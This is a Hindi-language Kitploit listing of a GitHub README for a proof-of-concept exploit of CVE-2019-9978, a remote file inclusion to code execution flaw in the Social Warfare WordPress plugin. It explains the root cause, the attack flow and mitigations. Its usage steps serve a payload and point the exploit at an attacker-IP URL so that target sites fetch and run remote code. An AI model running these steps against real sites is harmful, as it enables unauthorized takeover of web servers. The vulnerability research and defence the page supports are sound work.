Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-9978-RCE-PoC — CVE 2019-9978 (Social Warfare प्लगइन) के मूल-कारण विश्लेषण और शोषण का प्रदर्शन करने वाला एक कस्टम Python प्रूफ-ऑफ-कॉन्सेप्ट, जो व्यावहारिक RFI से RCE हमले के प्रवाह पर केंद्रित है। | Kitploit
उपकरण/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

CVE 2019-9978 (Social Warfare प्लगइन) के मूल-कारण विश्लेषण और शोषण का प्रदर्शन करने वाला एक कस्टम Python प्रूफ-ऑफ-कॉन्सेप्ट, जो व्यावहारिक RFI से RCE हमले के प्रवाह पर केंद्रित है।

रिपॉजिटरी देखें
219 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-9978 RCE PoC – Social Warfare WordPress प्लगइन शोषण

अनधिकृत रिमोट फ़ाइल समावेशन (RFI) से रिमोट कोड निष्पादन (RCE)


📌 विवरण

यह रिपॉजिटरी CVE-2019-9978 के शोषण को प्रदर्शित करने वाला एक पायथन-आधारित प्रूफ ऑफ कॉन्सेप्ट (PoC) है, जो Social Warfare WordPress प्लगइन में एक गंभीर कमजोरी है।

यह कमजोरी एक अनधिकृत हमलावर को रिमोट फ़ाइल समावेशन (RFI) करने की अनुमति देती है, जिसे हमलावर-नियंत्रित सर्वर पर एक दुर्भावनापूर्ण पेलोड होस्ट करके Remote Code Execution (RCE)* तक बढ़ाया जा सकता है।

यह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए नियंत्रित WordPress प्रयोगशाला वातावरण में विकसित और परीक्षण किया गया था।


🔍 कमजोरी का सारांश

विवरणमान
CVE ID:CVE-2019-9978
प्रभावित घटक:Social Warfare (WordPress प्लगइन)
प्रभावित संस्करण:≤ 3.5.2
कमजोरी का प्रकार:Remote File Inclusion (RFI)
प्रभाव:Remote Code Execution (RCE)
प्रमाणीकरण आवश्यक:नहीं
आक्रमण वेक्टर:रिमोट
गंभीरता:गंभीर

🧠 मूल कारण विश्लेषण

Social Warfare प्लगइन उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को ठीक से मान्य और स्वच्छ नहीं करता है जिसका उपयोग रिमोट सामग्री समावेशन के लिए किया जाता है।
परिणामस्वरूप, एक हमलावर एक दुर्भावनापूर्ण बाहरी URL प्रदान कर सकता है, जिससे अनधिकृत रिमोट फ़ाइल समावेशन होता है।

जब शामिल की गई रिमोट फ़ाइल में निष्पादन योग्य PHP कोड होता है, तो इसे WordPress सर्वर के संदर्भ में निष्पादित किया जाता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।


🔄 आक्रमण प्रवाह

अनधिकृत HTTP अनुरोध
↓
रिमोट फ़ाइल समावेशन (बाहरी URL)
↓
दुर्भावनापूर्ण पेलोड निष्पादन
↓
रिमोट कोड निष्पादन (RCE)

🧪 प्रूफ ऑफ कॉन्सेप्ट (PoC)

  1. हमलावर एक बाहरी HTTP सर्वर पर एक दुर्भावनापूर्ण पेलोड होस्ट करता है
  2. कमजोर Social Warfare एंडपॉइंट रिमोट फ़ाइल को शामिल करता है
  3. पेलोड लक्ष्य WordPress सर्वर पर निष्पादित होता है
  4. हमलावर को रिमोट कमांड निष्पादन प्राप्त होता है
  5. शोषण स्क्रिप्ट परीक्षण और अनुसंधान उद्देश्यों के लिए इस प्रक्रिया को स्वचालित करती है

▶️ उपयोग

चरण 1: पेलोड को होस्ट करें

python3 -m http.server 8000

अपनी पेलोड फ़ाइल (जैसे, payload-main.txt) को सर्वर निर्देशिका में रखें।


चरण 2: शोषण निष्पादित करें

python3 exploit.py <लक्ष्य-साइट.com> http://हमलावर-आईपी:8000/payload-main.txt

🛠 आवश्यकताएँ

  • Python 3.x
  • Social Warfare WordPress प्लगइन का कमजोर संस्करण
  • WordPress परीक्षण वातावरण
  • पेलोड होस्टिंग के लिए स्थानीय या रिमोट HTTP सर्वर

🛡 शमन और बचाव

  • Social Warfare प्लगइन को पैच किए गए संस्करण में अपडेट करें

  • रिमोट फ़ाइल समावेशन अक्षम करें:

    allow_url_include = Off
    
  • WordPress प्लगइन्स में बाहरी URL हैंडलिंग को प्रतिबंधित करें

  • RFI पहचान नियमों के साथ एक वेब एप्लिकेशन फ़ायरवॉल (WAF) तैनात करें


⚠️ कानूनी अस्वीकरण

यह परियोजना केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।

स्पष्ट अनुमति के बिना इस प्रूफ ऑफ कॉन्सेप्ट का उपयोग सिस्टम के खिलाफ न करें। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


🔗 संदर्भ और श्रेय

  • मूल शोधकर्ता: Luka Sikic
  • मूल PoC संदर्भ: https://github.com/hash3liZer/CVE-2019-9978
  • लेखक / अनुकूलन: Vaidehi Muluru
टूल डाउनलोड करें